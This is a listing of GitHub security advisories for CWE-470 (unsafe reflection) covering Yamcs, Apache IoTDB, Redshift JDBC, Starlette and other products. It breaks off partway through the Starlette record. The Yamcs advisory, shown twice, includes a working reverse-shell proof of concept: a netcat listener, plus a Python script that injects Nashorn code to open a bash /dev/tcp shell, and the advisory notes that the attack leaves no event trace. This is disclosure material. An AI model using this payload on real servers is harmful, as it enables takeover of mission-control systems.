CWE-470
AllowedUse of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
Abstraction: Base · Status: Draft
The product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.
111 vulnerabilities reference this CWE, most recent first.
GHSA-R68H-Q8CP-98MX
Vulnerability from github – Published: 2026-07-01 18:31 – Updated: 2026-07-01 18:31NVIDIA Megatron Bridge for Linux contains a vulnerability where an attacker could cause improper control of dynamically managed code resources. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, and information disclosure.
{
"affected": [],
"aliases": [
"CVE-2026-24246"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-01T16:16:45Z",
"severity": "HIGH"
},
"details": "NVIDIA Megatron Bridge for Linux contains a vulnerability where an attacker could cause improper control of dynamically managed code resources. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, and information disclosure.",
"id": "GHSA-r68h-q8cp-98mx",
"modified": "2026-07-01T18:31:47Z",
"published": "2026-07-01T18:31:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24246"
},
{
"type": "WEB",
"url": "https://github.com/NVIDIA/product-security/tree/main/2026/5841"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24246"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V4P4-86J5-2F8Q
Vulnerability from github – Published: 2026-07-10 09:31 – Updated: 2026-07-10 18:32Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache IoTDB. The pipe processor reads a fully qualified Java class name and instantiates it using Class.forName().newInstance() without any validation or allowlisting.
This issue affects Apache IoTDB: from 1.0.0 before 2.0.10.
Users are recommended to upgrade to version 2.0.10, which fixes the issue.
{
"affected": [],
"aliases": [
"CVE-2026-40008"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-10T08:16:22Z",
"severity": "CRITICAL"
},
"details": "Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027) vulnerability in Apache IoTDB.\nThe pipe processor reads a fully\nqualified Java class name and\ninstantiates it using Class.forName().newInstance() without any\nvalidation or allowlisting.\n\n\nThis issue affects Apache IoTDB: from 1.0.0 before 2.0.10.\n\nUsers are recommended to upgrade to version 2.0.10, which fixes the issue.",
"id": "GHSA-v4p4-86j5-2f8q",
"modified": "2026-07-10T18:32:13Z",
"published": "2026-07-10T09:31:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40008"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/fm8cpvzbox2qqy99ztglm8wkk1nrg9ng"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/07/10/5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VMWP-VH32-RJ75
Vulnerability from github – Published: 2026-05-27 22:45 – Updated: 2026-05-27 22:45Remote Code Execution via Mission Database algorithm override
Summary
The Nashorn ScriptEngine used to evaluate user-supplied algorithm text in MdbOverrideApi.updateAlgorithm is constructed without a ClassFilter, allowing a user with the ChangeMissionDatabase privilege to execute arbitrary Java code on the Yamcs server. In Yamcs's default configuration (no security.yaml), the built-in guest user has superuser=true, so the vulnerability is reachable without authentication.
Details
Vulnerable file: yamcs-core/src/main/java/org/yamcs/algorithms/ScriptAlgorithmExecutorFactory.java
// L46-53 Nashorn engine obtained without a ClassFilter
ScriptEngineFactory factory = scriptEngineManager.getEngineFactories().stream()
.filter(candidate -> !JDK_BUILTIN_NASHORN_ENGINE_NAME.equals(candidate.getEngineName())
&& candidate.getNames().contains(language))
.findFirst().orElse(null);
if (factory != null) {
scriptEngine = factory.getScriptEngine(); // ← ClassFilter not supplied
}
// L109 user-supplied algorithm text reaches eval()
scriptEngine.eval(functionScript);
NashornScriptEngineFactory.getScriptEngine() accepts an optional ClassFilter that restricts which classes JavaScript can reach via Java.type(...). Yamcs passes no filter, so attacker-supplied JavaScript can reach any Java class — for example, Java.type("java.lang.Runtime").getRuntime().exec(...) runs arbitrary OS commands inside the Yamcs JVM.
The path from HTTP request to eval is:
MdbOverrideApi.updateAlgorithm (yamcs-core/src/main/java/org/yamcs/http/api/MdbOverrideApi.java:145-189)
→ AlgorithmManager.overrideAlgorithm (yamcs-core/src/main/java/org/yamcs/algorithms/AlgorithmManager.java:529-559)
→ ScriptAlgorithmExecutorFactory.makeExecutor (yamcs-core/src/main/java/org/yamcs/algorithms/ScriptAlgorithmExecutorFactory.java:102-117)
→ scriptEngine.eval(...).
PoC
Run against any reachable Yamcs deployment that has at least one JavaScript CustomAlgorithm in its MDB (the simulator example MDB includes several, such as /YSS/SIMULATOR/Battery_Voltage_Avg).
Attacker-side listener:
nc -lvnp 4444
#!/usr/bin/env python3
"""
Usage: python3 <poc>.py http://target:8090 LHOST LPORT
"""
import json, sys, time, urllib.request
TARGET = sys.argv[1].rstrip("/")
LHOST = sys.argv[2]
LPORT = int(sys.argv[3])
INSTANCE = "simulator"
PROCESSOR = "realtime"
ALGORITHM = "YSS/SIMULATOR/Battery_Voltage_Avg"
# Close the generated wrapper function with `}`, execute the payload at
# top level, then re-open a dummy function so the trailing `}` emitted
# by ScriptAlgorithmExecutorFactory parses. No throw -> no event fired.
payload = (
'} '
'Java.type("java.lang.Runtime").getRuntime().exec('
f'["bash","-c","exec 3<>/dev/tcp/{LHOST}/{LPORT}; id >&3; sh -i <&3 >&3 2>&3"]); '
'function _x(){'
)
patch = f"{TARGET}/api/mdb-overrides/{INSTANCE}/{PROCESSOR}/algorithms/{ALGORITHM}"
def http(method, url, body=None):
req = urllib.request.Request(url, data=json.dumps(body).encode() if body else None,
method=method, headers={"Content-Type": "application/json"})
return urllib.request.urlopen(req, timeout=10).read()
http("PATCH", patch, {"action": "SET", "algorithm": {"text": payload}})
time.sleep(2)
http("PATCH", patch, {"action": "RESET"})
The override path emits events only when evaluation fails: a WARNING from ScriptAlgorithmExecutorFactory.java:112 and a CRITICAL from AlgorithmManager.java:546. Any syntactically valid payload — like the one above — succeeds silently and no event is fired, so the attack leaves no trace in the Yamcs event stream.
Impact
Arbitrary code runs as the OS user running the Yamcs server, leading to compromise of that server and disruption of the mission it controls.
For a Yamcs deployment managing spacecraft operations, an attacker can: - forge or block telecommands, suppress alarms, and tamper with the telemetry archive — disrupting or seizing control of the mission; - read any file the Yamcs process can read (cryptographic keys, credentials, MDB source files, configuration); - pivot to other ground-station systems reachable from the server (TSE instruments, neighboring Yamcs instances, internal services); - install a persistent backdoor via the same primitive.
Who is impacted:
- All Yamcs deployments running in the default configuration (no security.yaml present): any unauthenticated network attacker that can reach the HTTP API port (default 8090).
- Yamcs deployments with security enabled: any user that has been granted the ChangeMissionDatabase system privilege. This privilege is commonly given to MDB engineers and operators who edit calibrators or thresholds; the vulnerability turns that privilege into arbitrary code execution on the server.
Affected Versions
All Yamcs releases that ship the algorithm override endpoint are affected — no ClassFilter has ever been applied to the script engine.
- First vulnerable release:
yamcs-4.7.3(2018-11-22). Introduced in commit951e505d18a3912813b59edc685cbcbd4c609906("added possibility to change in a running processor alarms, calibrations and algorithms texts"). The commit added theChangeAlgorithmRequestRPC (later renamedUpdateAlgorithmRequest) and routed it asPATCH /api/mdb/{instance}/{processor}/algorithms/{name*}. - Routing change at
yamcs-5.5.0(2021-04): the endpoint was split out ofMdbApiintoMdbOverrideApiand moved toPATCH /api/mdb-overrides/{instance}/{processor}/algorithms/{name*}. The underlyingscriptEngine.eval(...)sink and the missingClassFilterare identical. - Latest release:
yamcs-5.12.6(commitf1a26fe54587fab9960d7e53fc1bf0c879220e9e) is affected. These four files (MdbOverrideApi.java,AlgorithmManager.java,ScriptAlgorithmExecutorFactory.java,SecurityStore.java) are unchanged between5.12.6and currentmaster(96d3e2d474415bea859f40ecbddc1bb8a0d141c1) — no upstream fix exists.
In short: every Yamcs release from 4.7.3 through 5.12.6, plus current master, is vulnerable (133 release tags spanning 2018-11-22 to present).
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.yamcs:yamcs-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.12.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46562"
],
"database_specific": {
"cwe_ids": [
"CWE-470",
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-27T22:45:49Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "# Remote Code Execution via Mission Database algorithm override\n\n## Summary\n\nThe Nashorn `ScriptEngine` used to evaluate user-supplied algorithm text in `MdbOverrideApi.updateAlgorithm` is constructed without a `ClassFilter`, allowing a user with the `ChangeMissionDatabase` privilege to execute arbitrary Java code on the Yamcs server. In Yamcs\u0027s default configuration (no `security.yaml`), the built-in `guest` user has `superuser=true`, so the vulnerability is reachable without authentication.\n\n## Details\n\n**Vulnerable file**: `yamcs-core/src/main/java/org/yamcs/algorithms/ScriptAlgorithmExecutorFactory.java`\n\n```java\n// L46-53 Nashorn engine obtained without a ClassFilter\nScriptEngineFactory factory = scriptEngineManager.getEngineFactories().stream()\n .filter(candidate -\u003e !JDK_BUILTIN_NASHORN_ENGINE_NAME.equals(candidate.getEngineName())\n \u0026\u0026 candidate.getNames().contains(language))\n .findFirst().orElse(null);\nif (factory != null) {\n scriptEngine = factory.getScriptEngine(); // \u2190 ClassFilter not supplied\n}\n\n// L109 user-supplied algorithm text reaches eval()\nscriptEngine.eval(functionScript);\n```\n\n`NashornScriptEngineFactory.getScriptEngine()` accepts an optional `ClassFilter` that restricts which classes JavaScript can reach via `Java.type(...)`. Yamcs passes no filter, so attacker-supplied JavaScript can reach any Java class \u2014 for example, `Java.type(\"java.lang.Runtime\").getRuntime().exec(...)` runs arbitrary OS commands inside the Yamcs JVM.\n\nThe path from HTTP request to `eval` is:\n`MdbOverrideApi.updateAlgorithm` (`yamcs-core/src/main/java/org/yamcs/http/api/MdbOverrideApi.java:145-189`)\n\u2192 `AlgorithmManager.overrideAlgorithm` (`yamcs-core/src/main/java/org/yamcs/algorithms/AlgorithmManager.java:529-559`)\n\u2192 `ScriptAlgorithmExecutorFactory.makeExecutor` (`yamcs-core/src/main/java/org/yamcs/algorithms/ScriptAlgorithmExecutorFactory.java:102-117`)\n\u2192 `scriptEngine.eval(...)`.\n\n## PoC\n\nRun against any reachable Yamcs deployment that has at least one JavaScript `CustomAlgorithm` in its MDB (the `simulator` example MDB includes several, such as `/YSS/SIMULATOR/Battery_Voltage_Avg`).\n\nAttacker-side listener:\n```\nnc -lvnp 4444\n```\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nUsage: python3 \u003cpoc\u003e.py http://target:8090 LHOST LPORT\n\"\"\"\nimport json, sys, time, urllib.request\n\nTARGET = sys.argv[1].rstrip(\"/\")\nLHOST = sys.argv[2]\nLPORT = int(sys.argv[3])\nINSTANCE = \"simulator\"\nPROCESSOR = \"realtime\"\nALGORITHM = \"YSS/SIMULATOR/Battery_Voltage_Avg\"\n\n# Close the generated wrapper function with `}`, execute the payload at\n# top level, then re-open a dummy function so the trailing `}` emitted\n# by ScriptAlgorithmExecutorFactory parses. No throw -\u003e no event fired.\npayload = (\n \u0027} \u0027\n \u0027Java.type(\"java.lang.Runtime\").getRuntime().exec(\u0027\n f\u0027[\"bash\",\"-c\",\"exec 3\u003c\u003e/dev/tcp/{LHOST}/{LPORT}; id \u003e\u00263; sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\"]); \u0027\n \u0027function _x(){\u0027\n)\n\npatch = f\"{TARGET}/api/mdb-overrides/{INSTANCE}/{PROCESSOR}/algorithms/{ALGORITHM}\"\n\ndef http(method, url, body=None):\n req = urllib.request.Request(url, data=json.dumps(body).encode() if body else None,\n method=method, headers={\"Content-Type\": \"application/json\"})\n return urllib.request.urlopen(req, timeout=10).read()\n\nhttp(\"PATCH\", patch, {\"action\": \"SET\", \"algorithm\": {\"text\": payload}})\ntime.sleep(2)\nhttp(\"PATCH\", patch, {\"action\": \"RESET\"})\n```\n\n\u003cimg width=\"1841\" height=\"881\" alt=\"nashorn-rce-poc\" src=\"https://github.com/user-attachments/assets/48432eea-67b5-4f3b-af97-c77325b0d671\" /\u003e\u003cbr\u003e\n\nThe override path emits events only when evaluation fails: a `WARNING` from `ScriptAlgorithmExecutorFactory.java:112` and a `CRITICAL` from `AlgorithmManager.java:546`. Any syntactically valid payload \u2014 like the one above \u2014 succeeds silently and **no event is fired**, so the attack leaves no trace in the Yamcs event stream.\n\n## Impact\nArbitrary code runs as the OS user running the Yamcs server, leading to compromise of that server and disruption of the mission it controls.\n\nFor a Yamcs deployment managing spacecraft operations, an attacker can:\n- forge or block telecommands, suppress alarms, and tamper with the telemetry archive \u2014 disrupting or seizing control of the mission;\n- read any file the Yamcs process can read (cryptographic keys, credentials, MDB source files, configuration);\n- pivot to other ground-station systems reachable from the server (TSE instruments, neighboring Yamcs instances, internal services);\n- install a persistent backdoor via the same primitive.\n\nWho is impacted:\n- **All Yamcs deployments running in the default configuration** (no `security.yaml` present): any unauthenticated network attacker that can reach the HTTP API port (default `8090`).\n- **Yamcs deployments with security enabled**: any user that has been granted the `ChangeMissionDatabase` system privilege. This privilege is commonly given to MDB engineers and operators who edit calibrators or thresholds; the vulnerability turns that privilege into arbitrary code execution on the server.\n\n## Affected Versions\n\nAll Yamcs releases that ship the algorithm override endpoint are affected \u2014 no `ClassFilter` has ever been applied to the script engine.\n\n- **First vulnerable release**: `yamcs-4.7.3` (2018-11-22). Introduced in commit `951e505d18a3912813b59edc685cbcbd4c609906` (\"added possibility to change in a running processor alarms, calibrations and algorithms texts\"). The commit added the `ChangeAlgorithmRequest` RPC (later renamed `UpdateAlgorithmRequest`) and routed it as `PATCH /api/mdb/{instance}/{processor}/algorithms/{name*}`.\n- **Routing change at `yamcs-5.5.0`** (2021-04): the endpoint was split out of `MdbApi` into `MdbOverrideApi` and moved to `PATCH /api/mdb-overrides/{instance}/{processor}/algorithms/{name*}`. The underlying `scriptEngine.eval(...)` sink and the missing `ClassFilter` are identical.\n- **Latest release**: `yamcs-5.12.6` (commit `f1a26fe54587fab9960d7e53fc1bf0c879220e9e`) is affected. These four files (`MdbOverrideApi.java`, `AlgorithmManager.java`, `ScriptAlgorithmExecutorFactory.java`, `SecurityStore.java`) are unchanged between `5.12.6` and current `master` (`96d3e2d474415bea859f40ecbddc1bb8a0d141c1`) \u2014 no upstream fix exists.\n\nIn short: **every Yamcs release from `4.7.3` through `5.12.6`, plus current `master`, is vulnerable** (133 release tags spanning 2018-11-22 to present).",
"id": "GHSA-vmwp-vh32-rj75",
"modified": "2026-05-27T22:45:49Z",
"published": "2026-05-27T22:45:49Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/yamcs/yamcs/security/advisories/GHSA-vmwp-vh32-rj75"
},
{
"type": "PACKAGE",
"url": "https://github.com/yamcs/yamcs"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Yamcs Vulnerable to Remote Code Execution via Mission Database algorithm override"
}
GHSA-W6X5-7FJJ-V49P
Vulnerability from github – Published: 2026-06-30 21:31 – Updated: 2026-06-30 21:31IBM WebSphere Extreme Scale 8.6.1.0 through 8.6.1.6 's Object Query Language engine resolves attacker-supplied class names via Class.forName() and invokes their constructors with no allow-list at three distinct sinks (SELECT NEW, enum literals, and reflection-based comparators); an authenticated remote attacker who can influence an application-built OQL query string can execute arbitrary constructors on the WAS JVM, and a SELECT DISTINCT variant using planted grid values fires the same gadget post-readObject in a manner that survives JEP-290 serialization filters across grid node boundaries
{
"affected": [],
"aliases": [
"CVE-2026-13772"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-30T20:17:29Z",
"severity": "HIGH"
},
"details": "IBM WebSphere Extreme Scale 8.6.1.0 through 8.6.1.6 \u0027s Object Query Language engine resolves attacker-supplied class names via Class.forName() and invokes their constructors with no allow-list at three distinct sinks (SELECT NEW, enum literals, and reflection-based comparators); an authenticated remote attacker who can influence an application-built OQL query string can execute arbitrary constructors on the WAS JVM, and a SELECT DISTINCT variant using planted grid values fires the same gadget post-readObject in a manner that survives JEP-290 serialization filters across grid node boundaries",
"id": "GHSA-w6x5-7fjj-v49p",
"modified": "2026-06-30T21:31:44Z",
"published": "2026-06-30T21:31:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13772"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7278593"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WMMV-VVG5-993Q
Vulnerability from github – Published: 2026-05-14 13:09 – Updated: 2026-05-14 13:09Summary
Amazon Redshift JDBC Driver is a Type 4 JDBC driver that provides database connectivity through the standard JDBC application program interfaces (APIs). An issue exists in versions prior to 2.2.2 where the driver could load arbitrary classes when processing certain connection URL parameters, potentially allowing code execution in the application context.
Impact
When a JDBC connection URL contains certain parameters, the driver processes the parameter values in a way that could trigger the execution of code from classes available on the application's classpath. An actor who can influence the JDBC connection URL could leverage this to execute code in the context of the application's JVM process. Successful exploitation could allow the actor to read sensitive data, modify application state, or disrupt service availability with the privileges of the application process.
Impacted versions: Amazon Redshift JDBC Driver < 2.2.2
Patches
This issue has been addressed in Amazon Redshift JDBC Driver version 2.2.2. We recommend upgrading to the latest version and ensuring any forked or derivative code is patched to incorporate the new fixes.
References
If you have any questions or comments about this advisory, we ask that you contact AWS Security via our vulnerability reporting page or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue.
Acknowledgement
We would like to thank Fushuling for collaborating on this issue through the coordinated issue disclosure process.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.amazon.redshift:redshift-jdbc42"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.2.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-8178"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-14T13:09:52Z",
"nvd_published_at": "2026-05-08T19:16:31Z",
"severity": "CRITICAL"
},
"details": "### Summary\nAmazon Redshift JDBC Driver is a Type 4 JDBC driver that provides database connectivity through the standard JDBC application program interfaces (APIs). An issue exists in versions prior to 2.2.2 where the driver could load arbitrary classes when processing certain connection URL parameters, potentially allowing code execution in the application context.\n\n### Impact\nWhen a JDBC connection URL contains certain parameters, the driver processes the parameter values in a way that could trigger the execution of code from classes available on the application\u0027s classpath. An actor who can influence the JDBC connection URL could leverage this to execute code in the context of the application\u0027s JVM process. Successful exploitation could allow the actor to read sensitive data, modify application state, or disrupt service availability with the privileges of the application process.\n\nImpacted versions: Amazon Redshift JDBC Driver \u003c 2.2.2\n\n### Patches\nThis issue has been addressed in Amazon Redshift JDBC Driver version [2.2.2](https://github.com/aws/amazon-redshift-jdbc-driver/releases/tag/v2.2.2). We recommend upgrading to the latest version and ensuring any forked or derivative code is patched to incorporate the new fixes.\n\n### References\nIf you have any questions or comments about this advisory, we ask that you contact AWS Security via our [vulnerability reporting page](https://aws.amazon.com/security/vulnerability-reporting) or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.\n\n### Acknowledgement\nWe would like to thank [Fushuling](https://github.com/Fushuling) for collaborating on this issue through the coordinated issue disclosure process.",
"id": "GHSA-wmmv-vvg5-993q",
"modified": "2026-05-14T13:09:52Z",
"published": "2026-05-14T13:09:52Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-wmmv-vvg5-993q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8178"
},
{
"type": "WEB",
"url": "https://aws.amazon.com/security/security-bulletins/2026-028-aws"
},
{
"type": "PACKAGE",
"url": "https://github.com/aws/amazon-redshift-jdbc-driver"
},
{
"type": "WEB",
"url": "https://github.com/aws/amazon-redshift-jdbc-driver/releases/tag/v2.2.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Amazon Redshift Vulnerable to Remote Code Execution via Unsafe Class Loading"
}
GHSA-WRX5-RP7M-MM49
Vulnerability from github – Published: 2022-10-06 18:52 – Updated: 2023-03-06 22:41This advisory has been withdrawn due to the CVE being rejected.
Original advisory text
Those using JXPath to interpret untrusted XPath expressions may be vulnerable to a remote code execution attack. All JXPathContext class functions processing a XPath string are vulnerable except compile() and compilePath() function. The XPath expression can be used by an attacker to load any Java class from the classpath resulting in code execution.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "commons-jxpath:commons-jxpath"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-41852"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2022-10-06T20:35:33Z",
"nvd_published_at": "2022-10-06T18:17:00Z",
"severity": "CRITICAL"
},
"details": "## This advisory has been withdrawn due to the CVE being rejected.\n\n## Original advisory text\nThose using JXPath to interpret untrusted XPath expressions may be vulnerable to a remote code execution attack. All JXPathContext class functions processing a XPath string are vulnerable except `compile()` and `compilePath()` function. The XPath expression can be used by an attacker to load any Java class from the classpath resulting in code execution.",
"id": "GHSA-wrx5-rp7m-mm49",
"modified": "2023-03-06T22:41:22Z",
"published": "2022-10-06T18:52:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41852"
},
{
"type": "WEB",
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47133"
},
{
"type": "WEB",
"url": "https://commons.apache.org/proper/commons-jxpath/users-guide.html#Standard_Extension_Functions"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/commons-jxpath"
},
{
"type": "WEB",
"url": "https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Withdrawn: CVE Rejected: JXPath vulnerable to remote code execution when interpreting untrusted XPath expressions",
"withdrawn": "2023-03-06T22:41:22Z"
}
GHSA-X3JP-WFM4-C9MV
Vulnerability from github – Published: 2025-12-10 18:30 – Updated: 2025-12-23 15:30Barracuda Service Center, as implemented in the RMM solution, in versions prior to 2025.1.1, does not correctly verify the name of an attacker-controlled WSDL service, leading to insecure reflection. This can result in remote code execution through either invocation of arbitrary methods or deserialization of untrusted types.
{
"affected": [],
"aliases": [
"CVE-2025-34393"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-10T16:16:24Z",
"severity": "CRITICAL"
},
"details": "Barracuda Service Center, as implemented in the RMM solution, in versions prior to 2025.1.1, does not correctly verify the name of an attacker-controlled WSDL service, leading to insecure reflection. This can result in remote code execution through either invocation of arbitrary methods or deserialization of untrusted types.",
"id": "GHSA-x3jp-wfm4-c9mv",
"modified": "2025-12-23T15:30:29Z",
"published": "2025-12-10T18:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34393"
},
{
"type": "WEB",
"url": "https://download.mw-rmm.barracudamsp.com/PDF/2025.1.1/RN_BRMM_2025.1.1_EN.pdf"
},
{
"type": "WEB",
"url": "https://www.barracuda.com/products/msp/network-protection/rmm"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/barracuda-rmm-service-center-insecure-reflection-rce"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-X637-X8P3-5P22
Vulnerability from github – Published: 2024-03-20 15:32 – Updated: 2024-12-05 22:17Spring Authorization Server versions 1.0.0 - 1.0.5, 1.1.0 - 1.1.5, 1.2.0 - 1.2.2 and older unsupported versions are susceptible to a PKCE Downgrade Attack for Confidential Clients.
Specifically, an application is vulnerable when a Confidential Client uses PKCE for the Authorization Code Grant.
An application is not vulnerable when a Public Client uses PKCE for the Authorization Code Grant.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.springframework.security:spring-security-oauth2-authorization-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.springframework.security:spring-security-oauth2-authorization-server"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"fixed": "1.2.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-22258"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2024-03-20T17:09:02Z",
"nvd_published_at": "2024-03-20T04:15:08Z",
"severity": "MODERATE"
},
"details": "Spring Authorization Server versions 1.0.0 - 1.0.5, 1.1.0 - 1.1.5, 1.2.0 - 1.2.2 and older unsupported versions are susceptible to a PKCE Downgrade Attack for Confidential Clients.\n\nSpecifically, an application is vulnerable when a Confidential Client\u00a0uses PKCE for the Authorization Code Grant.\n\nAn application is not vulnerable when a Public Client\u00a0uses PKCE for the Authorization Code Grant.\n\n",
"id": "GHSA-x637-x8p3-5p22",
"modified": "2024-12-05T22:17:59Z",
"published": "2024-03-20T15:32:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22258"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-authorization-server/commit/a7035d22bd2de6c24e7125623d38fb83d8f659a9"
},
{
"type": "WEB",
"url": "https://spring.io/security/cve-2024-22258"
},
{
"type": "PACKAGE",
"url": "github.com/spring-projects/spring-authorization-server"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Improper Authentication in Spring Authorization Server"
}
GHSA-X746-7M8F-X49C
Vulnerability from github – Published: 2026-06-15 20:16 – Updated: 2026-07-09 21:05Summary
When dispatching a request, HTTPEndpoint selects the handler by lowercasing the HTTP method and looking it up as an attribute with getattr, without restricting the lookup to a known set of HTTP verbs.
When an HTTPEndpoint subclass is registered through Route(...) without an explicit methods= argument, the route does not constrain the method and every method reaches the endpoint. If a non-standard HTTP method whose lowercased name matches an attribute on the endpoint subclass reaches the endpoint, that attribute is invoked as if it were a request handler. An attacker can use this to reach methods that were never meant to be HTTP handlers, such as internal helpers, without the authorization checks applied by the intended public handler.
Details
HTTPEndpoint uses the client-supplied method name to resolve an instance attribute, without validating it against the set of HTTP verbs the endpoint supports. A method such as _DO_DELETE therefore resolves an attribute like _do_delete and invokes it. Non-standard methods are valid RFC 9110 token methods, so an endpoint must not treat the method name as a trusted attribute selector.
Impact
An application is affected when all of the following hold:
- It defines an
HTTPEndpointsubclass and registers it viaRoute(...)without an explicitmethods=argument. - The subclass defines additional methods whose names match a non-standard HTTP-method token shape and that accept a single
requestargument and return a response.
This also affects frameworks built on Starlette, like FastAPI.
Mitigation
Register HTTPEndpoint subclasses with an explicit methods= argument on the Route, listing only the HTTP verbs the endpoint supports. The route then rejects any other method with 405 Method Not Allowed before it reaches the endpoint, so non-standard methods cannot resolve an attribute.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "starlette"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48817"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T20:16:05Z",
"nvd_published_at": "2026-06-17T20:17:22Z",
"severity": "MODERATE"
},
